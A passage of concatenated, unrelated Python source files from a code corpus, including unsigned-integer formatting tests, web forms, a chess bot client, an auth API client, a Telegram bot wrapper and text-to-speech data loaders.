assert u.literal.oct == f'{0xDEADBEEF:#13o}'
assert u.literal.dec == f'{0xDEADBEEF}'
assert u.literal.hex == f'{0xDEADBEEF:#10x}'
def test_fmt_wire():
u = Uint(0xDEADBEEF, 32)
assert u.wire.bin == f"32'b{0xDEADBEEF:032b}"
assert u.wire.oct == f"32'o{0xDEADBEEF:011o}"
assert u.wire.dec == f"32'd{0xDEADBEEF}"
assert u.wire.hex == f"32'h{0xDEADBEEF:08x}"
def test_public_api():
"""
Exposed functions are:
- raw -> int, returns unsigned number
- native -> int, same as `raw`
- literal.bin -> str, Python literal representation (binary)
- literal.oct -> str, Python literal representation (octal)
- literal.dec -> str, Python literal representation (decimal)
- literal.hex -> str, Python literal representation (hexadecimal)
- wire.bin -> str, Verilog wire representation (binary)
- wire.oct -> str, Verilog wire representation (octal)
- wire.dec -> str, Verilog wire representation (decimal)
- wire.hex -> str, Verilog wire representation (hexadecimal)
"""
u = Uint(0x5a, 8)
assert u.raw == 0x5a
assert u.native == 0x5a
assert u.literal.bin == "0b01011010"
assert u.literal.oct == "0o132"
assert u.literal.dec == "90"
assert u.literal.hex == "0x5a"
assert u.wire.bin == "8'b01011010"
assert u.wire.oct == "8'o132"
assert u.wire.dec == "8'd90"
assert u.wire.hex == "8'h5a"
def test_assign():
u = Uint(0, 8)
u.assign(0xff)
assert u.raw == 0xff
u.assign(-1)
assert u.raw == 0xff
def test_minus():
u = Uint(0x01, 8)
u = -u
assert u.raw == 0xff
def test_lt():
x, y = Uint(0x01, 8), Uint(0x02, 8)
m = Uint(-1, 8)
assert x < y
assert not y < x
assert not x < x
assert x < m
def test_le():
x, y = Uint(0x01, 8), Uint(0x02, 8)
m = Uint(-1, 8)
assert x <= y
assert not y <= x
assert x <= x
assert x <= m
def test_eq():
x, y = Uint(1, 8), Uint(2, 8)
m, n = Uint(-1, 8), Uint(255, 8)
assert x == x
assert not x == y
assert m == n
def test_ne():
x, y = Uint(1, 8), Uint(2, 8)
m, n = Uint(-1, 8), Uint(255, 8)
assert not x != x
assert x != y
assert not m != n
def test_ge():
x, y = Uint(0x01, 8), Uint(0x02, 8)
m = Uint(-1, 8)
assert not x >= y
assert y >= x
assert x >= x
assert not x >= m
def test_gt():
x, y = Uint(0x01, 8), Uint(0x02, 8)
m = Uint(-1, 8)
assert not x > y
assert y > x
assert not x > x
assert not x > m
def test_bool():
x, y = Uint(0x00, 8), Uint(0x01, 8)
assert not bool(x)
assert bool(y)
def test_abs():
x = Uint(0x01, 8)
m = Uint(-1, 8)
assert abs(x) == 1
assert abs(m) == 255
def test_add():
x, y = Uint(0x00, 8), Uint(0x1, 8)
full = Uint(0xff, 8)
assert (x + 39).raw == 39
assert (x + y).raw == 1
assert (full + 1).raw == 0
def test_and():
x, y, z = Uint(0x5a5a, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
i = 0x0a50
assert (x & y).raw == 0x5a00
assert (x & z).raw == 0x005a
assert (x & i).raw == 0x0a50
def test_floordiv():
x, y = Uint(39, 8), Uint(13, 8)
i = 3
assert (x // y).raw == 3
assert (x // i).raw == 13
def test_index():
x = Uint(39, 8)
assert int(x) == 39
def test_invert():
x = Uint(0x005a, 16)
assert (~x).raw == 0xffa5
def test_lshift():
x = Uint(0xa005, 16)
assert (x << 1).raw == 0x400a
assert (x << 2).raw == 0x8014
assert (x << 16).raw == 0
def test_mod():
x, y = Uint(39, 8), Uint(10, 8)
assert (x % y).raw == 9
assert (x % 10).raw == 9
def test_mul():
m, k = Uint(3, 8), Uint(13, 8)
assert (m * k).raw == 39
assert (m * 13).raw == 39
def test_matmul():
x, y = Uint(0, 8), Uint(1, 8)
with pytest.raises(TypeError):
x @ y
def test_neg():
x = Uint(0x5a, 8)
assert (-x).raw == 0xa6
def test_or():
x, y, z = Uint(0x0000, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
i = 0x0a50
assert (x | y).raw == 0x5a00
assert (x | z).raw == 0x005a
assert (y | i).raw == 0x5a50
def test_pos():
x = Uint(0xff, 8)
assert (+x).raw == 0xff
def test_pow():
x, y = Uint(0x05, 8), Uint(0x05, 8)
assert (x ** y).raw == 53
def test_rshift():
x = Uint(0xa005, 16)
assert (x >> 1).raw == 0x5002
assert (x >> 2).raw == 0x2801
assert (x >> 16).raw == 0
def test_sub():
x, y = Uint(0xff, 8), Uint(0x0f, 8)
i = 15
assert (x - y).raw == 0xf0
assert (x - i).raw == 0xf0
def test_truediv():
x, y = Uint(0, 8), Uint(1, 8)
with pytest.raises(TypeError):
x / y
def test_xor():
x, y, z = Uint(0x0000, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
i = 0x0a50
assert (x ^ y).raw == 0x5a00
assert (x ^ z).raw == 0x005a
assert (y ^ i).raw == 0x5050
def test_misc_magics():
u = Uint(0xff, 8)
assert str(u) == '<uint8, value=255>'
assert f'{u:08b}' == '11111111'
| StarcoderdataPython |
183637 | """
byceps.blueprints.admin.webhook.forms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 <NAME>
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from flask_babel import lazy_gettext
from wtforms import BooleanField, SelectMultipleField, StringField
from wtforms.validators import InputRequired, Optional
from wtforms.widgets import CheckboxInput, ListWidget
from ....announce.events import EVENT_TYPES_TO_NAMES
from ....util.l10n import LocalizedForm
class MultiCheckboxField(SelectMultipleField):
widget = ListWidget(prefix_label=False)
option_widget = CheckboxInput()
def _get_event_type_choices() -> list[tuple[str, str]]:
event_names = EVENT_TYPES_TO_NAMES.values()
return [(event_name, event_name) for event_name in sorted(event_names)]
class _BaseForm(LocalizedForm):
description = StringField(lazy_gettext('Description'), [InputRequired()])
format = StringField(lazy_gettext('Format'), [InputRequired()])
url = StringField(lazy_gettext('URL'), [InputRequired()])
event_types = MultiCheckboxField(
lazy_gettext('Event types'),
choices=_get_event_type_choices(),
validators=[InputRequired()],
)
class CreateForm(_BaseForm):
pass
class UpdateForm(_BaseForm):
text_prefix = StringField(lazy_gettext('Text prefix'), [Optional()])
extra_fields = StringField(lazy_gettext('Additional fields'), [Optional()])
enabled = BooleanField(lazy_gettext('Enabled'))
| StarcoderdataPython |
138575 | <gh_stars>1-10
# =============================================================================
# Federal University of Rio Grande do Sul (UFRGS)
# Connectionist Artificial Intelligence Laboratory (LIAC)
# <NAME> - <EMAIL>
# =============================================================================
# Copyright (c) 2011 <NAME>, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# =============================================================================
'''This is the base client for LIAC CHESS.
Use `LiacBot` as your base class to create a new bot.
'''
import sys
import json
import time
import socket
import random
class LiacBot(object):
'''LiacBot implements a basic client for LIAC CHESS.
LiacBot encapsulates the basic features to communicate with the LIAC CHESS
server, such as serialization and deserialization of json messages,
connection handshaking, etc. Use this class as a base implementation for
your bots.
'''
name = ''
ip = '127.0.0.1'
port = 50100
def __init__(self):
'''Constructor.'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not self.name:
self.name = random.choice([
'Liacnator', '<NAME>', 'Liaczors', 'Liaco'
])
# INTERNAL METHODS ========================================================
def _connect(self):
'''(INTERNAL) Connects to the server.'''
self._socket.connect((self.ip, self.port))
def _send_data(self, data):
'''(INTERNAL) Serialize a ``data`` object and sends it to the server.
:param data: a Python object.
'''
d = json.dumps(data)
self._socket.sendall(d)
def _receive_data(self):
'''(INTERNAL) Receives a message from server and deserialize it.
:return: a Python object.
'''
data = self._socket.recv(2**12)
return json.loads(data)
def _send_name(self):
'''(INTERNAL) Sends the bot's name to the server as part of the
handshaking procedure.
'''
self._send_data({
'name':self.name
})
def _receive_state(self):
'''(INTERNAL) Handle a state message.'''
state = self._receive_data()
if state['winner'] != 0 or state['draw']:
self.on_game_over(state)
else:
self.on_move(state)
# =========================================================================
# INTERFACE ===============================================================
def send_move(self, from_, to_):
'''Sends a movement to the server.
:param from_: a 2-tuple with the piece-to-move position.
:param to_: a 2-tuple with the target position.
'''
self._send_data({
'from': from_,
'to': to_
})
def on_move(self, state):
'''Receives the state from server, when the server asks for a movement.
Consult the documentation see which information comes within the
`state` object.
:param state: a state object.
'''
pass
def on_game_over(self, state):
'''Receives the state from server, when the server acknowledges a
winner for the game.
Consult the documentation see which information comes within the
`state` object.
:param state: a state object.
'''
pass
def start(self):
'''Starts the bot.'''
self._connect()
self._send_name()
while True:
self._receive_state()
# =========================================================================
if __name__ == '__main__':
bot = LiacBot()
bot.start() | StarcoderdataPython |
127789 | <gh_stars>1-10
#!/usr/bin/python3
from sympy import *
init_printing()
q00, q01, q02, q03 = symbols('q_00 q_01 q_02 q_03')
q11, q12, q13 = symbols('q_11 q_12 q_13')
q22, q23 = symbols('q_22 q_23')
q33 = symbols('q_33')
allQ = [q00, q01, q02, q03, q11, q12, q13, q22, q23, q33]
Pix0, Pix1, Pix2, Pix3 = symbols('zR_x0, zR_x1, zR_x2, zR_x3')
Piy0, Piy1, Piy2, Piy3 = symbols('zR_y0, zR_y1, zR_y2, zR_y3')
Piz0, Piz1, Piz2, Piz3 = symbols('zR_z0, zR_z1, zR_z2, zR_z3')
Pix = Matrix([[Pix0], [Pix1], [Pix2], [Pix3]])
Piy = Matrix([[Piy0], [Piy1], [Piy2], [Piy3]])
Piz = Matrix([[Piz0], [Piz1], [Piz2], [Piz3]])
Q = Matrix([[q00, q01, q02, q03], [q01, q11, q12, q13], [q02, q12, q22, q23], [q03, q13, q23, q33]])
eq1 = (Pix.T * Q * Pix - Piy.T * Q * Piy)[0]
eq2 = (Pix.T * Q * Piy)[0]
eq3 = (Piy.T * Q * Piz)[0]
eq4 = (Piz.T * Q * Pix)[0]
eq5 = (Piz.T * Q * Piz)[0]
eq1 = rcollect(expand(eq1), *allQ)
eq2 = rcollect(expand(eq2), *allQ)
eq3 = rcollect(expand(eq3), *allQ)
eq4 = rcollect(expand(eq4), *allQ)
eq5 = rcollect(expand(eq5), *allQ)
def extract_coefficients(expr):
def index(args):
for i in range(len(args)):
if args[i] in allQ:
return i
return 0
D = { x.args[index(x.args)] : Mul(*(x.args[:index(x.args)] + x.args[index(x.args) + 1:])) for x in expr.args }
return [D[q] for q in allQ]
def make_row(expr):
return ' & '.join([latex(expr).replace('zR', 'P') for expr in extract_coefficients(expr)])
system = open("system.tex", "w+")
system.write("\\center \\begin{rotate}{270}")
system.write("\\smatheq {\n\t\\matrix {\n")
system.write("\t" + make_row(eq1) + "\\\\\n")
system.write("\t" + make_row(eq2) + "\\\\\n")
system.write("\t" + make_row(eq3) + "\\\\\n")
system.write("\t" + make_row(eq4) + "\\\\\n")
system.write("\t" + make_row(eq5) + "\\\\\n")
system.write("\t} \cdot \n")
system.write("\t\\matrix {\n")
for q in allQ:
system.write(latex(q) + "\\\\")
system.write("\t}\n}\n\\end{rotate}")
a, b, c, d, e, f, g, h, i, j, k, l = symbols('a b c d e f g h i j k l')
A = Matrix([
[a, b, c],
[d, e, f],
[g, h, i],
[j, k, l]])
Q = A * A.T
print(Q)
print(Q[0,:])
print(Q[1,:])
print(Q[2,:])
print(Q[3,:]) | StarcoderdataPython |
111560 | from src.db import db
from src.models.base import BaseModel, BaseSchema
class Node(BaseModel):
dataset_id = db.Column(db.Integer, db.ForeignKey('dataset.id'), nullable=False)
dataset = db.relationship('Dataset', backref=db.backref('nodes', cascade="all, delete-orphan"))
name = db.Column(db.String)
class NodeSchema(BaseSchema):
class Meta(BaseSchema.Meta):
model = Node
| StarcoderdataPython |
142568 | <reponame>praekeltfoundation/seed-services-client
from demands import JSONServiceClient, HTTPServiceClient
class AuthApiClient(object):
"""
Client for Auth Service.
:param str email:
An email address.
:param str password:
<PASSWORD>.
:param str api_url:
The full URL of the API.
"""
def __init__(self, email, password, api_url, session=None,
session_http=None):
if session is None:
session = JSONServiceClient(url=api_url)
# login
data = {"email": email, "password": password}
login = session.post('/user/tokens/', data=data)
self.token = login["token"]
headers = {'Authorization': 'Token %s' % self.token}
session = JSONServiceClient(url=api_url, headers=headers)
self.session = session
if session_http is None:
session_http = HTTPServiceClient(url=api_url, headers=headers)
self.session_http = session_http
def get_permissions(self):
return self.session.get('/user/')
def get_users(self):
return self.session.get('/users/')
def create_user(self, user):
return self.session.post('/users/', data=user)
def get_user(self, user):
return self.session.get('/users/%s/' % user)
def update_user(self, user_id, user):
return self.session.put('/users/%s/' % user_id, data=user)
def remove_user_from_team(self, user, team):
# Returns a 204 with empty content so lets return True if it worked
response = self.session_http.delete('/teams/%s/users/%s/' % (
team, user,))
if response.status_code == 204:
return True
else:
return False
def add_user_to_team(self, user, team):
# Returns a 204 with empty content so lets return True if it worked
response = self.session_http.put('/teams/%s/users/%s/' % (team, user,))
if response.status_code == 204:
return True
else:
return False
def delete_user(self, user_id):
# archives, soft delete
response = self.session_http.delete('/users/%s/' % user_id)
if response.status_code == 204:
return True
else:
return False
def get_teams(self):
return self.session.get('/teams/')
def create_team(self, org, team):
return self.session.post('/organizations/%s/teams/' % org, data=team)
def create_permission(self, team, permission):
return self.session.post('/teams/%s/permissions/' % team,
data=permission)
| StarcoderdataPython |
143548 | <filename>solvebio/resource/__init__.py
from __future__ import absolute_import
from .apiresource import ListObject
from .user import User
from .dataset import Dataset
from .datasetfield import DatasetField
from .datasetimport import DatasetImport
from .datasetexport import DatasetExport
from .datasetcommit import DatasetCommit
from .datasetmigration import DatasetMigration
from .datasettemplate import DatasetTemplate
from .vault_sync_task import VaultSyncTask
from .object_copy_task import ObjectCopyTask
from .manifest import Manifest
from .object import Object
from .vault import Vault
from .task import Task
from .beacon import Beacon
from .beaconset import BeaconSet
from .application import Application
from .group import Group
from .savedquery import SavedQuery
types = {
'Application': Application,
'Beacon': Beacon,
'BeaconSet': BeaconSet,
'Dataset': Dataset,
'DatasetImport': DatasetImport,
'DatasetExport': DatasetExport,
'DatasetCommit': DatasetCommit,
'DatasetMigration': DatasetMigration,
'DatasetTemplate': DatasetTemplate,
'DatasetField': DatasetField,
'Group': Group,
'Manifest': Manifest,
'Object': Object,
'ObjectCopyTask': ObjectCopyTask,
'ECSTask': Task,
'VaultSyncTask': VaultSyncTask,
'User': User,
'Vault': Vault,
'list': ListObject,
'SavedQuery': SavedQuery,
}
| StarcoderdataPython |
3301090 | <filename>handlers/__init__.py
from common_handler import *
from main_handler import *
| StarcoderdataPython |
17260 | import OIL.color
import OIL.label
import OIL.parser
import OIL.tools
import OIL.errors | StarcoderdataPython |
1760319 | #!/usr/bin/env python3
import random
import time
values = [15,20,25]*4 # default 20 degrees, 3 sensors in 4 locations
while True:
values = list(map(lambda x: x+random.uniform(-0.5,0.5), values))
for value in values:
# print('{:0.2f}'.format(value)+';', end='')
print('{:0.2f}'.format(value).replace('.',',')+';', end='')
print(flush=True)
time.sleep(5)
| StarcoderdataPython |
3264256 | import os
from pysaurus.application import exceptions
from pysaurus.core.components import AbsolutePath
from pysaurus.core.functions import package_dir
from pysaurus.core.modules import System
try:
BIN_PATH = AbsolutePath.join(
package_dir(), "bin", System.get_identifier()
).assert_dir()
ALIGNMENT_RAPTOR = AbsolutePath.join(
BIN_PATH, System.get_lib_basename("alignmentRaptor", prefix="")
).assert_file()
RUN_VIDEO_RAPTOR_BATCH = AbsolutePath.join(
BIN_PATH, System.get_exe_basename("runVideoRaptorBatch")
).assert_file()
RUN_VIDEO_RAPTOR_THUMBNAILS = AbsolutePath.join(
BIN_PATH, System.get_exe_basename("runVideoRaptorThumbnails")
).assert_file()
__prev_path = os.environ["PATH"]
__prev_library_path = os.environ.get("LIBRARY_PATH", "")
__prev_ld_library_path = os.environ.get("LD_LIBRARY_PATH", "")
os.environ["PATH"] = f"{__prev_path}{os.pathsep}{BIN_PATH}"
os.environ["LIBRARY_PATH"] = f"{__prev_library_path}{os.pathsep}{BIN_PATH}"
os.environ["LD_LIBRARY_PATH"] = f"{__prev_ld_library_path}{os.pathsep}{BIN_PATH}"
except Exception as exc:
raise exceptions.CysaurusUnavailable() from exc
| StarcoderdataPython |
1691134 | <reponame>sNoDliD/SecondTerm<gh_stars>0
import requests
import datetime
from functools import wraps
from .my_config import TOKEN
def debug(func):
@wraps(func)
def wrapper_debug(*args, **kwargs):
args_repr = list(map(repr, args))
kwargs_repr = list(f"{k}={v!r}" for k, v in kwargs.items())
signature = ", ".join(args_repr + kwargs_repr)
print(f"Вызываем {func.__name__}({signature})")
value = func(*args, **kwargs)
print(f"{func.__name__!r} возвращает {value!r}")
return value
return wrapper_debug
def timer(func):
@wraps(func)
def wrapper_timer(*args, **kwargs):
start = datetime.datetime.today()
value = func(*args, **kwargs)
total = datetime.datetime.today() - start
print(f"Функция {func.__name__!r} выполнена за {total.total_seconds():.4f} мс")
return value
return wrapper_timer
def _check_result(result):
if result.status_code != 200:
msg = 'The server returned HTTP {0} {1}. Response body:\n[{2}]' \
.format(result.status_code, result.reason, result.text.encode('utf8'))
raise Exception(msg)
try:
result_json = result.json()
except:
msg = 'The server returned an invalid JSON response. Response body:\n[{0}]'.format(result.text.encode('utf8'))
raise Exception(msg)
if not result_json['ok']:
msg = 'Error code: {0} Description: {1}' \
.format(result_json['error_code'], result_json['description'])
raise Exception(msg)
return result_json
class Bot:
__instance = None
def __new__(cls):
if not Bot.__instance:
print('create new instance of bot')
instance = object.__new__(cls)
instance.bot_url = f'https://api.telegram.org/bot{TOKEN}/'
instance._session = None
Bot.__instance = instance
return Bot.__instance
@timer
def send_message(self, user, text, markup=None, clear_markup=True):
data = {'chat_id': user.id, 'text': text, 'parse_mode': 'HTML'}
if markup:
data['reply_markup'] = markup.dumps()
if clear_markup and user.last_markup:
self.edit_markup(user, user.last_markup)
message = self.__do_request('sendMessage', data)
if clear_markup and markup:
user.last_markup = message['message_id']
return message
def edit_message(self, user, message_id, text, markup=None):
if not message_id:
return self.send_message(user, text, markup)
data = {'chat_id': user.id, 'text': text, 'message_id': message_id,
'reply_markup': markup.dumps() if markup else None}
message = self.__do_request('editMessageText', data)
if markup:
if user.last_markup and user.last_markup != message_id:
self.edit_markup(user, user.last_markup)
user.last_markup = message['message_id']
elif user.last_markup == message_id:
user.last_markup = None
return message
def delete_message(self, chat_id, message_id, replace=None):
data = {'chat_id': chat_id, 'message_id': message_id}
try:
return self.__do_request('deleteMessage', data)
except:
data['text'] = replace or 'Отменено'
try:
return self.__do_request('editMessageText', data)
except:
return Exception
@timer
def answer_callback_query(self, query_id, text, alert=False):
data = {'callback_query_id': query_id, 'text': text, 'show_alert': alert}
return self.__do_request('answerCallbackQuery', data)
def get_updates(self, offset, limit=1):
data = {'limit': limit, 'offset': offset}
return self.__do_request('getUpdates', data)
def leave_chat(self, chat_id):
data = {'chat_id': chat_id}
return self.__do_request('leaveChat', data)
def get_chat(self, chat_id):
data = {'chat_id': chat_id}
return self.__do_request('getChat', data)
def edit_markup(self, user, message_id, markup=None):
data = {'chat_id': user.id, 'message_id': message_id}
if markup:
data['reply_markup'] = markup.dumps()
user.last_markup = None
return self.__do_request('editMessageReplyMarkup', data)
def __do_request(self, method_name, param, method='post'):
if not self._session:
self._session = requests.session()
return _check_result(self._session.request(method, self.bot_url + method_name, param))['result']
| StarcoderdataPython |
137483 | <filename>python/data_utils.py
import time
import os
import random
import numpy as np
import torch
import torch.utils.data
import commons
from mel_processing import spectrogram_torch
from utils import load_wav_to_torch, load_filepaths_and_text
from text import text_to_sequence, cleaned_text_to_sequence
#add
from retry import retry
class TextAudioLoader(torch.utils.data.Dataset):
"""
1) loads audio, text pairs
2) normalizes text and converts them to sequences of integers
3) computes spectrograms from audio files.
"""
def __init__(self, audiopaths_and_text, hparams, use_test = True):
self.audiopaths_and_text = load_filepaths_and_text(audiopaths_and_text)
self.text_cleaners = hparams.text_cleaners
self.max_wav_value = hparams.max_wav_value
self.sampling_rate = hparams.sampling_rate
self.filter_length = hparams.filter_length
self.hop_length = hparams.hop_length
self.win_length = hparams.win_length
self.sampling_rate = hparams.sampling_rate
self.use_test = use_test
self.cleaned_text = getattr(hparams, "cleaned_text", False)
self.add_blank = hparams.add_blank
self.min_text_len = getattr(hparams, "min_text_len", 1)
self.max_text_len = getattr(hparams, "max_text_len", 190)
random.seed(1234)
random.shuffle(self.audiopaths_and_text)
self._filter()
def _filter(self):
"""
Filter text & store spec lengths
"""
# Store spectrogram lengths for Bucketing
# wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2)
# spec_length = wav_length // hop_length
audiopaths_and_text_new = []
lengths = []
for audiopath, text in self.audiopaths_and_text:
if self.min_text_len <= len(text) and len(text) <= self.max_text_len:
audiopaths_and_text_new.append([audiopath, text])
lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length))
self.audiopaths_and_text = audiopaths_and_text_new
self.lengths = lengths
def get_audio_text_pair(self, audiopath_and_text):
# separate filename and text
audiopath, text = audiopath_and_text[0], audiopath_and_text[1]
text = self.get_text(text)
if self.use_test != True:
text = torch.as_tensor("a")
spec, wav = self.get_audio(audiopath)
return (text, spec, wav)
def get_audio(self, filename):
audio, sampling_rate = load_wav_to_torch(filename)
if sampling_rate != self.sampling_rate:
raise ValueError("{} {} SR doesn't match target {} SR".format(
sampling_rate, self.sampling_rate))
audio_norm = audio / self.max_wav_value
audio_norm = audio_norm.unsqueeze(0)
spec_filename = filename.replace(".wav", ".spec.pt")
if os.path.exists(spec_filename):
spec = torch.load(spec_filename)
else:
spec = spectrogram_torch(audio_norm, self.filter_length,
self.sampling_rate, self.hop_length, self.win_length,
center=False)
spec = torch.squeeze(spec, 0)
torch.save(spec, spec_filename)
return spec, audio_norm
def get_text(self, text):
if self.cleaned_text:
text_norm = cleaned_text_to_sequence(text)
else:
text_norm = text_to_sequence(text, self.text_cleaners)
if self.add_blank:
text_norm = commons.intersperse(text_norm, 0)
text_norm = torch.LongTensor(text_norm)
return text_norm
def __getitem__(self, index):
return self.get_audio_text_pair(self.audiopaths_and_text[index])
def __len__(self):
return len(self.audiopaths_and_text)
class TextAudioCollate():
""" Zero-pads model inputs and targets
"""
def __init__(self, return_ids=False):
self.return_ids = return_ids
def __call__(self, batch):
"""Collate's training batch from normalized text and aduio
PARAMS
------
batch: [text_normalized, spec_normalized, wav_normalized]
"""
# Right zero-pad all one-hot text sequences to max input length
_, ids_sorted_decreasing = torch.sort(
torch.LongTensor([x[1].size(1) for x in batch]),
dim=0, descending=True)
max_text_len = max([len(x[0]) for x in batch])
max_spec_len = max([x[1].size(1) for x in batch])
max_wav_len = max([x[2].size(1) for x in batch])
text_lengths = torch.LongTensor(len(batch))
spec_lengths = torch.LongTensor(len(batch))
wav_lengths = torch.LongTensor(len(batch))
text_padded = torch.LongTensor(len(batch), max_text_len)
spec_padded = torch.FloatTensor(len(batch), batch[0][1].size(0), max_spec_len)
wav_padded = torch.FloatTensor(len(batch), 1, max_wav_len)
text_padded.zero_()
spec_padded.zero_()
wav_padded.zero_()
for i in range(len(ids_sorted_decreasing)):
row = batch[ids_sorted_decreasing[i]]
text = row[0]
text_padded[i, :text.size(0)] = text
text_lengths[i] = text.size(0)
spec = row[1]
spec_padded[i, :, :spec.size(1)] = spec
spec_lengths[i] = spec.size(1)
wav = row[2]
wav_padded[i, :, :wav.size(1)] = wav
wav_lengths[i] = wav.size(1)
if self.return_ids:
return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, ids_sorted_decreasing
return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths
"""Multi speaker version"""
class TextAudioSpeakerLoader(torch.utils.data.Dataset):
"""
1) loads audio, speaker_id, text pairs
2) normalizes text and converts them to sequences of integers
3) computes spectrograms from audio files.
"""
def __init__(self, audiopaths_sid_text, hparams, no_text = False):
self.audiopaths_sid_text = load_filepaths_and_text(audiopaths_sid_text)
self.text_cleaners = hparams.text_cleaners
self.max_wav_value = hparams.max_wav_value
self.sampling_rate = hparams.sampling_rate
self.filter_length = hparams.filter_length
self.hop_length = hparams.hop_length
self.win_length = hparams.win_length
self.sampling_rate = hparams.sampling_rate
self.no_text = no_text
self.cleaned_text = getattr(hparams, "cleaned_text", False)
self.add_blank = hparams.add_blank
self.min_text_len = getattr(hparams, "min_text_len", 1)
self.max_text_len = getattr(hparams, "max_text_len", 190)
random.seed(1234)
random.shuffle(self.audiopaths_sid_text)
self._filter()
@retry(exceptions=(IOError), tries=10, delay=1)
def _filter(self):
"""
Filter text & store spec lengths
"""
# Store spectrogram lengths for Bucketing
# wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2)
# spec_length = wav_length // hop_length
audiopaths_sid_text_new = []
lengths = []
for audiopath, sid, text in self.audiopaths_sid_text:
if self.min_text_len <= len(text) and len(text) <= self.max_text_len:
audiopaths_sid_text_new.append([audiopath, sid, text])
lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length))
self.audiopaths_sid_text = audiopaths_sid_text_new
self.lengths = lengths
def get_audio_text_speaker_pair(self, audiopath_sid_text):
# separate filename, speaker_id and text
audiopath, sid, text = audiopath_sid_text[0], audiopath_sid_text[1], audiopath_sid_text[2]
text = self.get_text(text)
if self.no_text:
text = self.get_text("a")
spec, wav = self.get_audio(audiopath)
sid = self.get_sid(sid)
return (text, spec, wav, sid)
def get_audio(self, filename):
audio, sampling_rate = load_wav_to_torch(filename)
# print(sampling_rate)
# print(self.sampling_rate)
# print(filename)
if sampling_rate != self.sampling_rate:
raise ValueError("{} {} SR doesn't match target {} SR".format(
sampling_rate, self.sampling_rate))
audio_norm = audio / self.max_wav_value
audio_norm = audio_norm.unsqueeze(0)
spec_filename = filename.replace(".wav", ".spec.pt")
spec_file_path =os.path.dirname(spec_filename) + "/spec/"+ os.path.basename(spec_filename)
if os.path.exists(spec_file_path):
#spec = torch.load(spec_file_path)
if os.path.isdir(os.path.dirname(spec_filename) + "/spec") == False:
os.mkdir(os.path.dirname(spec_filename) + "/spec")
spec = spectrogram_torch(audio_norm, self.filter_length,
self.sampling_rate, self.hop_length, self.win_length,
center=False)
spec = torch.squeeze(spec, 0)
torch.save(spec, spec_file_path)
else:
if os.path.isdir(os.path.dirname(spec_filename) + "/spec") == False:
os.mkdir(os.path.dirname(spec_filename) + "/spec")
spec = spectrogram_torch(audio_norm, self.filter_length,
self.sampling_rate, self.hop_length, self.win_length,
center=False)
spec = torch.squeeze(spec, 0)
torch.save(spec, spec_file_path)
# spec = spectrogram_torch(audio_norm, self.filter_length,
# self.sampling_rate, self.hop_length, self.win_length,
# center=False)
# spec = torch.squeeze(spec, 0)
# torch.save(spec, spec_filename)
return spec, audio_norm
def get_text(self, text):
if self.cleaned_text:
text_norm = cleaned_text_to_sequence(text)
else:
text_norm = text_to_sequence(text, self.text_cleaners)
if self.add_blank:
text_norm = commons.intersperse(text_norm, 0)
text_norm = torch.LongTensor(text_norm)
return text_norm
def get_sid(self, sid):
sid = torch.LongTensor([int(sid)])
return sid
def __getitem__(self, index):
return self.get_audio_text_speaker_pair(self.audiopaths_sid_text[index])
def __len__(self):
return len(self.audiopaths_sid_text)
class TextAudioSpeakerCollate():
""" Zero-pads model inputs and targets
"""
def __init__(self, return_ids=False, no_text = False):
self.return_ids = return_ids
self.no_text = no_text
def __call__(self, batch):
"""Collate's training batch from normalized text, audio and speaker identities
PARAMS
------
batch: [text_normalized, spec_normalized, wav_normalized, sid]
"""
# Right zero-pad all one-hot text sequences to max input length
_, ids_sorted_decreasing = torch.sort(
torch.LongTensor([x[1].size(1) for x in batch]),
dim=0, descending=True)
max_text_len = max([len(x[0]) for x in batch])
max_spec_len = max([x[1].size(1) for x in batch])
max_wav_len = max([x[2].size(1) for x in batch])
text_lengths = torch.LongTensor(len(batch))
spec_lengths = torch.LongTensor(len(batch))
wav_lengths = torch.LongTensor(len(batch))
sid = torch.LongTensor(len(batch))
text_padded = torch.LongTensor(len(batch), max_text_len)
spec_padded = torch.FloatTensor(len(batch), batch[0][1].size(0), max_spec_len)
wav_padded = torch.FloatTensor(len(batch), 1, max_wav_len)
text_padded.zero_()
spec_padded.zero_()
wav_padded.zero_()
for i in range(len(ids_sorted_decreasing)):
row = batch[ids_sorted_decreasing[i]]
text = row[0]
text_padded[i, :text.size(0)] = text
text_lengths[i] = text.size(0)
spec = row[1]
spec_padded[i, :, :spec.size(1)] = spec
spec_lengths[i] = spec.size(1)
wav = row[2]
wav_padded[i, :, :wav.size(1)] = wav
wav_lengths[i] = wav.size(1)
sid[i] = row[3]
if self.return_ids:
return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid, ids_sorted_decreasing
return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid
class DistributedBucketSampler(torch.utils.data.distributed.DistributedSampler):
"""
Maintain similar input lengths in a batch.
Length groups are specified by boundaries.
